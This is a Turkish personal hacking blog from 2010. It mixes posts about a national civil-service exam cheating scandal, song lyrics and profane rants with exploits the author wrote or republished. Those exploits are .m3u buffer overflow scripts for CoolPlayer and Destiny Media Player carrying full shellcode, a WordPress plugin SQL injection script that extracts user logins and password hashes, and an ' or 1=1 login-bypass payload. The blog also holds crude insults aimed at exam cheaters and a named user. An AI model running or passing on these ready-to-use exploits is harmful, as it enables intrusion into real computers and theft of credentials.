"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

31 Ağustos 2010 Salı

soruları çalan namussuzlara

ne bekliyodunuz ben ve ben gibiler aylarca calısacak sizde beleşten atanıcaksınız öylemi ? oldu baska ? işte böyle ipliğiniz pazara çıkar. düşünebiliyor musunuz adam hırsız olcak ve gidecek genc nesiller yetiştirecek. ulan pezevenkler önce kendinizi eğitin, kendinizi yetiştirin. hırsızlığı mı öğreteceksiniz yeni nesile. soruları calanlar: alayınız orospu çoçuğu.

KPSS kopya skandalı nereye doğru gidiyor?

Artık şu görülmektedirki, ortada bir delil olmasa da, 350 adayın 120 net, 3000'ü aşkın adayın da 110'dan fazla net yapmış olması imkansıza yakın görünmektedir. Ancak sorun kopya skandalının nasıl ortaya çıkarılacağındadır.

Savcılık dışında kalan Devlet kurumlarının yapacağı araştırma istihbari ve adli bir nitelik taşımadığı için bir noktada tıkanmaktadır. Gerek ÖSYM, gerek YÖK, gerek MEB gerekse de Cumhurbaşkanlığı şuan için bu 3 bini aşkın adayın ortak niteliğini araştırmaktadır. Fakat bu araştırmalardan bir delile gidilmesi zor görünmektedir. Bu durum YÖK Denetleme Kurulu incelemesinde de ortaya çıkmıştır. Bizzat YÖK Başkanı hala bir delile ulaşılamadığını açıklamıştır.

Bu nedenle, Savcılık soruşturması çok daha önemli bir hale gelmiştir. Zira, gerek telefon dinlemesi gerek istihbarat gerekse de adli diğer detaylara ulaşma yetkisi Savcılıktadır. Savcılık bu işte Emniyet kanalıyla çalışacaktır. Dolaysıyla emniyet istihbarattaki polislere büyük iş düşmektedir. Ancak bu noktada, bazı ziyaretçiler, suçu hem bir gruba attığı hem de bu grubun Emniyette güçlü olduğu ifade edildiği için, soruşturmadan da bir şey çıkmayacağı da ifade edilmektedir. Böyle bir durumun oluşması yani savcılık soruşturmasından da bir şey çıkmaması halinde, bizzat YÖK Başkanının, "350 adayın 120 net yapması mümkün değil, sorular elden ele dolaşmış" şeklinde yaptığı açık tespit oratada kalacaktır. Bu nedenle Savcılığın söz konusu grupla ilgili iddiaları da göz önüne alarak, işi yürütecek Emniyet personeline dikkat etmesi uygun olacaktır.Aksi bir durumda hem Devlet hem kurumlar hem de yargı makamı büyük güven kaybına uğrayacaktır. 800 bin adayın gözü bu soruşturmadadır.

Burada bir diğer husus da şudur: Savcılık soruların elden ele dolaştığını tespit etmiş olsa dahi, bu soruların kaç kişiye sızdığı nasıl bulunacaktır. Zira 120 net yapan aday üzerindeki teşhis fazla zor değildir. Ancak 100 veya daha fazla net yapan adaylara da soruların sızıp sızmadığını bulmak çok zor olacaktır. Oluşan durumu yeni bir fırsat olarak görüp sınavın iptalini isteyen adaylar dışında kalan 800 bine yakın aday sınavın iptalini istememektedir. Ancak Savcılığın yapacağı tespit sonrasında eğer soruların sınav öncesinde sızdığı tespit edilirse, bu aşamadan sonra soruların kaç kişiye sızdığını, soruları alan kişilerin bu soruları hangi arkadaşlarına servis ettiği, onların kimse servis ettiği gibi sorulara da yanıt bulunması gerekecektirki, bu oldukça zor bir tespit olacaktır.

Hem adaylar hem memurlar.net olarak, Savcılığın bu konuyu son yılların en büyük skandalı olarak görmesini umut ediyoruz.

kaynak: http://www.memurlar.net/haber/175649/

29 Ağustos 2010 Pazar

Türk Eğitim-Sen, KPSS'deki kopya iddiası için belge açıkladı

350 adayın 120 soruyu doğru cevaplaması ve 3 bine yakın adayın da 110'un üzerinde net çıkardığı 2010 yılı KPSS Eğitim Bilimleri testindeki kopya iddialarına ilişkin ilk ciddi belge Türk Eğitim Sen tarafından açıklandı. Türk Eğitim Sen Başkanı İsmail Koncuk, 116 sorunun 5 Temmuz'da Uludağ Üniversitesinden mezun bir öğretmen adayına mail yoluyla gönderildiğine dair belgeyi Savcılığa verdiğini açıkladı.

Türk Eğitim-Sen Genel Başkanı İsmail Koncuk, KPSS'den önce eğitim bilimleri sorularının ham halinin Uludağ Üniversitesi Sınıf Öğretmenliği bölümünden 2007'de mezun olan bir kişinin e-mail adresine servis edildiğini öne sürdü.

Koncuk, sendika genel merkezinde düzenlediği basın toplantısında, sendika tarafından yapılan tespitlere göre, KPSS'ye ilişkin iddiaların 50-100 kişiyle sınırlı olmadığını, binlerce kişiye soruların servis edildiğini yüzde 100 ispat ettiklerini savundu.

Olayların ortaya çıkmasından adeta bir korku duyulduğunu iddia eden Koncuk, “Bu işi yapanların ortaya çıkmasından da korkuluyor. Belki bu olaylar, geçmiş yıllarda da yapıldı ancak, bu yıl ortaya çıktı. (Benim adamım yaparsa her şey mübahtır) anlayışı Türkiye'yi uçurumun kenarına sürükler, bu anlayıştan kurtulmak lazım. Ahlaksızlığı yapan ahlaksızdır, namussuzluğu yapan namussuzdur. Bunu tespit edemediğimiz sürece emin olun ülkenin geleceği hiç de iyi değildir” dedi.

“ŞİFRE VERİLEREK SORULAR DAĞITILDI İDDİASI”

Koncuk, sözlerinin ardından KPSS eğitim bilimleri sorularını içeren “PDF” formatında bir dosyayı gazetecilere gösterdi.

Dosyanın 5 Temmuz 2010'da saat 14.22'de oluşturulduğunu anlatan Koncuk, dosya tarihinin değiştirilmediğini, orijinal dosya üzerinde değişiklik yapılmadığını da tespit ettiklerini söyledi.

Konucuk, sınavın 10 Temmuzda, eğitim bilimleri testinin de aynı gün öğleden sonra yapıldığını anımsatarak, şu iddialarda bulundu:

“Bu dosya 5 Temmuzda oluşturuldu. Bu dosyada ne var? Dosya, sınavdan beş gün önce oluşturulmuş. Bu dosya bizim tespit ettiğimiz bir e-mail adresine gönderiliyor. O e-mail adresini hukuken suç olduğu için söylemeyeceğim. Ama bu bilgiyi ve o e-mail adresinin sahibini biz tespit ettik. Bu sorular o e-mail adresine gönderilmiş. Bu yüzde yüz. Uludağ Üniversitesi Eğitim Fakültesi'nden 2007'de sınıf öğretmenliği bölümünden mezun olmuş bir KPSS adayına ait hotmail uzantılı bir e-mail bu. Bu kişi erkek ve doğum yeri İç Akdeniz'e doğru bir ilimizin ilçesi. Ayrıca sınavda tam puan da alamamış. Bu sorular, muhtemelen her il merkezindeki onlarca kişiye gönderildi ve onların e-mail adresinin üzerinden başkaları bu soruları aldı.

Yani bir e-mail adresine sorular geliyor. Ben arıyorum birilerini ve 'benim e-mail adresime gir şifresi de şu. Bu şifreden soruları al' diyorum. Şöyle de olabilir. Bunların eğitim bilimleri sınavına ait olduğu da söylenmemiş olabilir. 'Al bundan faydalan' da denilmiş olabilir. Yani kopya olduğu anlaşılmasın diye. Bu da mümkündür.”

Bu olayı tesadüfen yakaladıklarını dile getiren Koncuk, “İlleri aşmışız ilçelere kadar bu sorular servis edilmiş” dedi. Koncuk, bu bilgileri istendiği takdirde, savcılığa, YÖK Denetleme Kurulu'na ve Devlet Denetleme Kurulu'na vereceklerini söyledi.

“IP ADRESLERİNDEN TESPİT EDİLSİN”

Kimlerin söz konusu e-mail adresine girdiğinin IP adreslerinden tespit edilebileceğini belirten Koncuk, “eğitim.son” adıyla oluşturulmuş bu dosyanın başka hangi e-mail adreslerine gittiğinin de hotmail sağlayıcıları tarafından belirlenebileceğini söyledi.

İsmail Koncuk, bu kişinin bulunduğu ilçenin kopya işlerinin merkezi olduğunu düşünmediğini de dile getirerek, “O, e-mail adresine başka e-mail adreslerinden soruların gelmesi kuvvetle muhtemel. Yani yetkililer çok net olarak bu e-mailin nereden gönderildiğini ortaya çıkarabilir” dedi.

“SORULAR HAM HALİYLE SERVİS EDİLMİŞ İDDİASI”

Tespit ettikleri dosyada yer alan soruların “ham” olduğunu, asıl sınavdakilerden ufak tefek farklılıklar gösterdiğini ve dosyada sınavdaki 4 sorunun bulunmadığını dile getiren Koncuk, “Bu durum, soruların daha baskıya girmeden, birilerinin eline geçtiğini, e-mail adreslerine servis edildiğini gösteriyor. Telefon trafiğiyle de belli gruplara servis edilmiş” dedi.

Bu grupların savcı tarafından belirlenmesi gerektiğini ifade eden Koncuk, “Bu, kesinlikle kendi mensuplarına, menfaat temin etmek isteyen, öncelik kazandırmak isteyen bir grubun işi. Bunu ortaya çıkarmak benim işim değil. Araştırmalarda bunların hangi gruplara ait olduğu da ortaya çıkacaktır” diye konuştu.

“Servis edilen sorularda, asıl sınavdaki sorularda bulunmayan bazı yazım ve ifade bozukluklarının bulunduğunu” iddia eden Koncuk, “Bu ham metin olduğu için birileri alelacele bu soruları bir yere göndermiş. Ama ÖSYM, bunları baskıdan önce düzeltmiş” dedi.

“DOST VE AKRABALARINA DA VERMİŞLERDİR”

Soruları ele geçirenlerin dost ve akrabalarına da bu soruları vermesinin mümkün olduğunu vurgulayan Koncuk, “Şunu çok net söyleyebiliriz. Bu sorular, yüzlerce değil, binlerce insana gönderilmiştir. Hatta sorular öylesine ortada gezmiş ki ayağa düşmüş” diye konuştu.

Bu tespitlerinin ardından savcılık, Devlet Denetleme Kurulu, YÖK Denetleme Kurulu'nun gerekeni yapması gerektiğini belirten Koncuk, “Bu işin üzerine gidilirse bu işe karışmış olan hemen herkes çorap söküğü gibi ortaya çıkacaktır. Bilgisayar aleminde yazdığınız her kelime attığınız her adım kayıt altına alınır” diye konuştu.

Koncuk, bunların ortaya çıkarılmaması halinde olayların arkasında başka konuların bulunduğunu düşüneceklerini söyledi.

“SINAV SİSTEMİ MERCEK ALTINA ALINMALI”

ÖSYM Başkanı Ünal Yarımağan'ın “düzgün bir adam” olduğuna inandığını dile getiren Koncuk, “Ama Yarımağan'ın altında yüzlerce insan var. Onun için ÖSYM sınav sisteminin de bir mercek altına alınması, sorgulanması gerektiğini olaylar gösteriyor” dedi.

Koncuk, soruları hakkıyla yapanları korumak istediklerini dile getirerek sözlerini şöyle tamamladı:

“Elimizde yarım bardak su var. İçerisine yüzde 10 kadar lağım suyu karışmış. (Şu tarafı temiz kalmış şu tarafını içeyim) deme hakkını kendimizde bulabilir miyiz? Bu kadar olaydan sonra (ben hakkımla yaptım) diyen insanlara güven kalır mı? Tüm derdimiz haksızlığa uğrayanlara hakkını teslim etmeye çalışmak. Ama artık bu kadar geniş boyut kazanmış olaylar yaşandıktan sonra (ben hakkımla almıştım, benim durumum ne olacak?) sorusu bayat kalıyor.”

kaynak: http://www.memurlar.net/haber/175477/

27 Ağustos 2010 Cuma

pythonZ dangalağına

pythonZ (o mal kendini iyi biliyor) acıyorum sana her(nesi)kimsen. la dangalak sen (nesi)kimsin ki ben yada life hakkında yorum yapasın. malmısın yokmusun olum siyego :S gitsen kumda oyna kaleler yap al bir ikide örnek sana


24 Ağustos 2010 Salı

velet - askın inadına

ne dediğini zaman zaman anlamayabilirsiniz ama sözler harbi süper ;)

eller gülümün elini ellemiş
şimdi allahın beni durdursun

velet - askın inadına [ by ogusan sungur ] | izlesene.com



bazen şarkılarla anlatırsın duygunu
bazense siirlerle
bezen sevdiğin uzaklarda olur
o nedenle ver sihiri gönder güvercinle
ben bi kuşum ve yanına geliyorum
kanımda bi not seni seviyorum
her gece camında gülümü bekliyorum
melek gibi yatışını izliyorum
yetmiyor bize ne bana nede sana
yanına gelsem ama bana gelecek bela
güneş doğuyor gülüm uyanacaksın
hadi ay parçam ,,,sana elveda!
kalbim alev alsın seviyorum
buralar sana uzak bunu biliyorum
ben güneşin amma sönüyorum
çağırsınlar gülümü duyamıyorum
biliyorum sana gelmek zor gibi
beni gören olsa derdi yok bunun evi
sensizlik ilk aşkın misali
bendeyse eski kötü mazi
yarim beni sevsin benide duysun
elimi beline koyup öyle uyusun
el bebek gül bebek gülümün dikeni
gönül yaramıda dikecektir elbet
yarim bana gelsin elimi tutsun
kanadımın hasreti acımı unutsun
eller gülümün elini ellemiş
şimdi allahın beni durdursun
gülüm sana bakmaya kıyamıyorum
sen benim namusum dokunamıyorum
sıcak tenin tenime değdimi alev alip
mum gibi karşında eriyorum
kalbinin zindanına beni bağla
ol bi dalga , fırtınayada kapılma
gel vur yanaş benim limanıma
alt üst et gemide ben ve koca tayfa
yazdım kazıdım adını bi ağaca
yaprak dökümü aşkım bahara
kar düşerse gülüm kapının önüne
girsin bir tohum gözünün içine
bak gözüm dinle bu şarkı SANA
besteler yazdım ben senin adına
aşklar dikendir basalım inadına
gülüm yanlızım yetiş imdadıma
yarim beni sevsin benide duysun
elimi beline koyup öyle uyusun
el bebek gül bebek gülümün dikeni
gönül yaramıda dikecektir elbet
yarim bana gelsin elimi tutsun
kanadımın hasreti acımı unutsun
eller gülümün elini ellemiş şimdi
allahın beni durdursun
sen bir kurşun kalbime sıktın
sensiz yaşamaktan gülüm bıktım
günlerim sayılı sana kavuşacam
kanadı kırık güvercinle barışacam
aylar bana yıllar gibi geldi
gülümün gülüşü gözümün önündeydi
acılar verdim nedeni neydi
onca acıya rağmen beni sevdi
gülüm biliyon mu bu şarkı sana
kuş ol bir öpücük kondur şurama burama
bu gecede sensiz yastıksa koynumda
taşıyom gülüm adını boynumda
bu şarkıyı özel birine yazdım
ve birkez daha adını andım
aşkın inadına sevecem seni
aşkın inadına sevecem seni
yarim beni sevsin benide duysun
elimi beline koyup öyle uyusun
el bebek gül bebek gülümün dikeni
gönül yaramıda dikecektir elbet
yarim bana gelsin elimi tutsun
kanadımın hasreti acımı unutsun
eller gülümün elini ellemiş şimdi
allahın beni durdursun

23 Ağustos 2010 Pazartesi

LifeSteaLeR dan bomba bi script geliyor gibi

dün demodan bi görüntü gönderdi gayet basarılı bi calısma olmus yani tema özellikle benim çok hoşuma gitti yakışır life kardesime hazırlasın valla bende kullanıcam tabi müsade ederse :P yav bıktım bu amk blogspottan :S şöyle kımıl kımıl bir domain (nasıl oluyorsa artık) fena olmaz sanırım :D

poffsss

içimden geldi valla ;) sıkıldım yav :S

20 Ağustos 2010 Cuma

Kpss 2010 Soruları Birilerine Verildi

neler neler olmusta haberimiz yok 2009 da eğitim sorusunu yanlış dahi olsa cevaplayamayan hatta sınava girmeye dahi gerek duymayan kişiler 2010 da eğitim fullemiş :S haberi olduğu gibi veriyorum buyrun sizde gözlerinizle sonucları görün (TC numaraları haric)

800 bin adayın katıldığı KPSSnin sonuçlarına göre 500’ün üzerinde katılımcının eğitim bilimleri sınavında 120de 120 net çıkarması da tartışma konusu oldu.

Bazı adaylar, 2009da yapılan KPSS’deki sınav birincisinin bile tüm soruları doğru yanıtlayamadığını anımsatarak, ‘Acaba polislik sınavında olduğu gibi sorular bazı kesimlerce ele mi geçirildi?’ kuşkusunu taşıdıklarını dile getirdi.

Netlerinin yanlış hesaplandığını ve puanlarının beklediklerinden daha düşük geldiğini öne süren adaylar, ÖSYMye dilekçeyle göndermeye başladı. ÖSYM Başkanı Prof. Dr. Ünal Yarımağan, KPSSye ilişkin yapacağım bir açıklama yok, bu yüzden bu konuda görüş belirtmek istemiyorum” diyerek soruları yanıtsız bıraktı.

Yetkililer, eğitim bilimleri sınavında çok sayıda adayın tüm soruları doğru yanıtlamasını da yine soruların kolay olmasına bağlayarak, “Sonucuyla ilgili kuşkuları olanlar bize başvurabilirler” mesajı verdiler.

Eğitim-Sen Genel Başkanı Zübeyde Kılıç da KPSS’ye yönelik güvensizliği artıracak bir dizi sorun yaşandığını vurgulayarak, şöyle konuştu;

Bu sorunlardan dolayı bazı kesimler, sonuçlara kuşkuyla yaklaşıyor. ÖSYMye ve yaptığı sınavlara ilişkin her sonuç açıklanması sırasında, ‘Acaba şimdi ne sorun çıkacak? sorusu akıllara geliyor. Çok sayıda aday bize de gelip kuşkularını dile getirdi. Ancak biz soruların çalındığına ilişkin net bir veriye sahip değiliz.

Bu bir olasılık dahilinde, polis koleji sınavında da bir şaibe olmuştu, sonra sınav iptal edilmişti. Şimdi de bazı şaibeler ortaya atılıyor ama elimizde bunu kanıtlayan herhangi bir şey yok. Elimizde kanıt olmadığı için bir şey söyleyemiyoruz.



Soy isimlerinde de benzerlik olan bazı kişilerin sonuçlarını gözledik. Bir Kaç Tc kimlik numarasından baktığımız sonuçlar şöyle:



http://sesiniduyur.org/kpss/vedat2009.htm

http://sesiniduyur.org/kpss/vedat2010.htm





http://sesiniduyur.org/kpss/filiz2009.htm

http://sesiniduyur.org/kpss/filiz2010.htm



http://sesiniduyur.org/kpss/levent2009.htm

http://sesiniduyur.org/kpss/levent2010.htm



http://sesiniduyur.org/kpss/seher2009.htm

http://sesiniduyur.org/kpss/seher2010.htm

kaynak:

http://sesiniduyur.org/detay-44-kpss_2010_sorulari_birilerine_verildi.html

19 Ağustos 2010 Perşembe

koyma açık, açık olmaz ;)

şimdi birazcık inj3ct0r.com da geziniyim dedim oda nesi biri acık yayınlamıs acığın sonuna da bypassı eklemiş ;) author vermiyorum darılmaca olmasın diye ;)



Vulnerable File in admin/giris.php
###################################################
################### Error Line'z ####################
$sorgu=mysql_query("select * from yonetim where isim='$isim' and sifre='$sifre'");
###################################################

Inject to giris.php
Exploitiez

id : ' or 1=1/*
pw : ' or 1=1/*



oldumu babacan demedin mi biri indirir scripti :S a.q adam engellemiş scripte bypassı boş bug göndermeyin inceleyin iyice :S sadece sorguya bakarak acık mevcut diyemezsin ki :S bak bakalım line 61 den aşağısına


//line 61
$isim=$_POST['isim'];
$sifre=$_POST['sifre'];
$isim=htmlspecialchars(mysql_real_escape_string($isim));
$sifre=htmlspecialchars(mysql_real_escape_string($sifre));



adam paşalar gibi önlemini almıs :S

sırf asağıda ki sorgudan yola cıkamazsın


//line 73
$sorgu=mysql_query("select * from yonetim where isim='$isim' and sifre='$sifre'");
$sayi=mysql_num_rows($sorgu);



ne biliyim a.q nerdesin str0ke :S

hobaaa eğitim full


işte gelde sorular çalındı amuğa koyum deme. benim girmediğim deneme kalmadı fullenecek sınavı da biliyoruz zor sınavıda bu seneki eğitime basit diyen adamın amına koyarım la hiç mi basit sınav görmedik sabahki basitti itiraz eden? efenim ? ses yok. ama eğitim zordu sabahkini fulleyemeyen adam eğitimi hiç fulleyemez rahat 10 tane kaynaklarda dahi olmayan bilgileri bilmeyi gerektiren soru vardı hem nerde görülmüş 300 üstü kişinin şimdiye kadar eğitim fullediği :S tabi bu ne kadar doğru bilemiyorum işte yazıya denk geldiğim site işte resim ;) benim devletimize ve hükümetimize güvenim sonsuz eminim ki gereken yapılacaktır sadece su fulleyenler ve fulle yakın yapanlar devre dısı bırakılsa dahi yeter sınavın iptaline gerek bile kalmaz

kaynak:

http://www.sesiniduyur.org/detay-41-_kpss_2010__da_kopya_olayi:_iste_kanit.html

kaynak 2:

http://www.memurlar.net/haber/174657/

18 Ağustos 2010 Çarşamba

kpss:2 - ZoRLu:2


meb kendi kalesine bir gol attı ama var bunda da bir bit yeniği de bakalım fen ve teknoloji taban puanı 80 :D görürsünüz bizlere 3. golü atmak için bi hamle bu bekleyelim görelim ;)

Ramazan da herhangi bir günüm

bu ay biliyorsunuz rut(in.) şimdi ramazanda herhangi bir günümden bahsedeyim. gece 4 ten sonra yat a.q ertesi gün 2-3 gibi uyan iftara kadar net iftar sonrası net yada tühkan :S yine sahuru yap 4 ten sonra yat ertesi güne bugünü kopyala yapıstır :S ramazanın kaçıncı gününü tutuyoruz ondan bile bi haber :S ramazan başlamış başlayalı hiç şaşmadı. hee bide mide ağrıları basladı bakalım hayırlısı.

//Not: Hayırlı Ramazanlar

14 Ağustos 2010 Cumartesi

sevemem senden baska gozum arar gozlerini

off ulan offf


sevemem senden baska gozum arar gozlerini
Yükleyen shursuz. - Öne çıkan müzik videolarını izleyin.

Sevemem senden başka
Gözüm arar gözlerini
Dil söyler kalbim ağlar
Yürek çeker özlemini
Kulağımdan sesini
Gözlerimden hayalini
Atamam ah atamam
Sen olmayınca yapamam

12 Ağustos 2010 Perşembe

kpss:2 - ZoRLu:1



ben böyle gol görmedim aga insan doksana takar mı? :S sonucu görünce sok oldum suan ağzım gözüm yara bere içinde dudağum uçukladı yav 82 küsür bişey almışım yav bi 3 puan ile insan acıkta kalırmı :S gecen sene 6 puan sapmayla 57 alacakken puanım 63 oldu bu sene 1 puan ya sapmıştır yada o kadar bile sapmamıştır böyle işin içine sıçayım :S napsınn bu kardeşiniz küçük bi tavsiye verin yön belirlememde etkili olur çok kararsızım :((((

11 Ağustos 2010 Çarşamba

sorgulama sayfası


saat 16:10 2 saattir sonucu öğrenmeye calısıyorum 3 kere resimdeki görüntü geldi amk bebeleri bide güvenlik kodu koymuslar ne sikime yarıyosaaa :S zehir zıkkım olsun bu milletin hakkı :S

14 te acıklayan ibnedir demiştim :D

hay sizin sisteminize :D lan saat 15:30 oldu halen daha server too busy :S la bi gidin yav :S

10 Ağustos 2010 Salı

KPSS 2010-Lisans sınavı sonuçları yarın açıklanacak

açıklamayın artık a.q 4 gündür bekliyoruz pazartesiden çarşambaya ne değişecekki illa bekleteceksiniz bu milleti :S ulan beklediğimiz birsey de bir gün zamanında gercekleşsin :/

haberin detayları:

Açıklamaya göre 10-11 Temmuz 2010 tarihlerinde yapılan Kamu Personel Seçme Sınavı (KPSS-Lisans) değerlendirilmesi çalışmaları tamamlandı.

Sonuçlar 11 Ağustos 2010 Çarşamba günü saat 14:00'da açıklanacak.

Adaylar sonuçları 11 Ağustos 2010 Çarşamba günü saat 14:00'dan itibaren http://www.osym.gov.tr internet adreslerinden öğrenebilecek.

kaynak:

http://www.cnnturk.com/2010/turkiye/08/10/kpss.2010.lisans.sinavi.sonuclari.yarin.aciklanacak/586244.0/index.html

8 Ağustos 2010 Pazar

CoolPlayer219_Bin (.m3u) (buf+eip+nop / 253 byt) Buffer Overflow Exploit (.py)

http://inj3ct0r.com/exploits/13618


#!/usr/bin/env python
#-*- coding:cp1254 -*-

print "**************************************************************************"
print " CoolPlayer219_Bin (.m3u) (buf+eip+nop / 253 byt) Buffer Overflow Exploit (.py)\n "
print " Exploited: ZoRLu / admin@yildirimordulari.com "
print " Thanks for first exploit : hadji samir (buf+eip+nop / 310 byt)"
print " Date: 08/08/2010 / Saat Gecenin 4 u "
print " Tested on: Windows Vista \n"
print " Home: z0rlu.blogspot.com "
print " Home: imhatimi.org "
print " Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N\n"
print "**************************************************************************"

karala = "\x41" * 237
eyip = "\x3D\x94\x0F\x77" #0x770F943D jmp esp / kernel32.dll
fiytiripat = "\x90" * 12
shell = (
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf"
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3"
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87"
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec"
"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae"
"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01"
"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2"
"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e"
"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a"
)


yazciz = karala + eyip + fiytiripat + shell
try:
olustur = open("zrl.m3u","w")
olustur.write(yazciz)
olustur.close()
print "Tamadir Exploit Hazir\n"
except:
print "Dosya Olusturulamadi\n"


# Inj3ct0r.com [2010-08-08]

Destiny Media Player 1.61 (.m3u/.lst) Buffer Overflow Exploit

http://inj3ct0r.com/exploits/13613


#!/usr/bin/perl
# Destiny Media Player 1.61 (.m3u/.lst) Buffer Overflow Exploit(.pl)
# Exploit Coded By ZoRLu / admin@yildirimordulari.com
# Date: 07/08/2010
# Tested on my XP pc: http://img530.imageshack.us/img530/336/dest.jpg
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N

my $karala = "\x90" x 2052;
#C:\Documents and Settings\Administrator\Desktop\find>Findjmp.exe kernel32.dll esp
#0x7C86467B jmp esp
my $blah = "\x7B\x46\x86\x7C";
my $fiytiripat = "\x90" x 12;
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";

open(myfile,'>>zrl.m3u');
print myfile $karala.$blah.$fiytiripat.$shellcode;
close(myfile)


# Inj3ct0r.com [2010-08-07]

7 Ağustos 2010 Cumartesi

findjmp

buffer overflow ile ilgilenenlerin işine yarar aradım zor buldum a.q :S sizlerlede paylaşayım kullanırsınız

Not:
içiniz rahat olsun dosyayı gönül rahatlığıyla indirip kullanabilirsiniz bende yamuk olmaz ;)

download:

http://hotfile.com/dl/60589778/0841783/findjmp.zip.html

5 Ağustos 2010 Perşembe

16 yaşındayım hacker olmak istiyorum :S



nette boş boş gezerken bir blogda gözüme şöyle bir yazı çarptı gözüm morardı :D 16 yaşındayım bilgisayardan iyi anlıyorum hacker olmak istiyorum hacker olma yoluna koyuldum. eğer resimdeki yazıyı okursanız sanki bir iş ilanı :S millete hack hacker bu gibi kelimeler nasıl lanse ediliyorsa artık biraz bilgisayara ilgi duyan direk hacker olcam diyor. hacker oldun nolcak a.q :S güzel ülkemin güzel insanları hack mack boş gibi laflarla nasihat çekmeyecem ama bu işe başlamadan önce iyice düşünün napıyorum ben demeyi ihmal etmeyin eğer amacınız voov x neymiş be dedirtmekse baştan hiçç girmeyin bu tarz işlere bana sorsanız amacınız nolursa olsun uzak durun ama illada yapacam diyorsanız amacınız boş hevesleri gerçekleştirmek olmasın.

Kendime Not:

//SonKr(o)liçe bile hacker olursa (!) bu veledim neden hacker olmasın be zorlu :D

2 Ağustos 2010 Pazartesi

exploitler ile ilgili

şimdi bu blogspot kafasına göre güvenlik uygulaması yapıyor ya :D dolayısıyla exploitleri tam yayınlayamıyorum yani kodlar eksik olabilir benim blogda. dolayısıyla verdiğim orjinal linklerden kullanın ;) blogspottan sıkılmaya başladım bakalım çözüm nolcak :S

WordPress Plugin myLDlinker (myLDlinker.php) SQL Injection Exploit (.py)

http://inj3ct0r.com/exploits/13553



========================================================================
WordPress Plugin myLDlinker (myLDlinker.php) SQL Injection Exploit (.py)
========================================================================


#!/usr/bin/env python
#-*- coding:utf-8 -*-

# WordPress Plugin myLDlinker (myLDlinker.php url) SQL Injection Exploit (.py)
# Author ZoRLu
# Exploit Coded By ZoRLu / Date: 02/08/2010
# Found H-SK33PY / Date: 22/07/2010
# Orijinal Link http://inj3ct0r.com/exploits/13438
# Tested on my vista proof: http://img196.imageshack.us/img196/5655/wordvm.jpg
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends

import sys, urllib2, re, os, time

if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " WordPress Plugin myLDlinker SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

add = "http://"
add2 = "/"

sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz

if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz

vulnfile = "myLDlinker.php"
sql = "?url=00000000+union+select+1,concat(0x3e3e3e,user_login,0x3a3a,user_pass,0x3a3a),3,4,5,6,7,8+from+wp_users--"
url = sitemiz + vulnfile + sql

print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)

try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r">>>(.*)([0-9a-fA-F])(.*)", veri)
if len(aliver) > 0:
print "user::hash:: " + aliver[0][0]

print "\nGood Job Bro!"
else:
print "Exploit failed..."


except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"


# Inj3ct0r.com [2010-08-02]

Eremetia (news.php & faq2.php id) SQL Injection Exploit (.py)

